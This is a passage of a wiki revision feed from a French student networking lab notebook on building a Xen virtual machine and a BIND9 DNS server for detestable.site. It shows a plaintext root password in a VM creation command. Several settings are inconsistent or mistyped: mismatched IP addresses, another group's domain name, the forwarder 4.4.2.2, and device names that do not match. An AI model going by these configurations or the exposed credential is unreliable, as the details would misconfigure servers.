  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              1         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:7A8:116E:60A4::1&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59671</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59671"/>
				<updated>2022-11-10T10:53:49Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59670</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59670"/>
				<updated>2022-11-10T10:53:27Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Cahier de suivi - Groupe 1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;demineur.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;demineur.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.demineur.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.demineur.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.demineur.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;demineur.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.demineur.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.demineur.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for demineur.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.demineur.site. root.demineur.site. (&lt;br /&gt;
                              1         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.demineur.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.164&lt;br /&gt;
NS  IN  A   193.48.57.164&lt;br /&gt;
NS  IN  AAAA    2001:7A8:116E:60A4::1&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.164&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;demineur.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup demineur.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59666</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59666"/>
				<updated>2022-11-10T10:50:34Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sommaire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59665</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59665"/>
				<updated>2022-11-10T10:49:54Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Création de la VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59662</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59662"/>
				<updated>2022-11-10T10:42:12Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sommaire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59661</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59661"/>
				<updated>2022-11-10T10:41:14Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Cahier de suivi - Groupe 1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
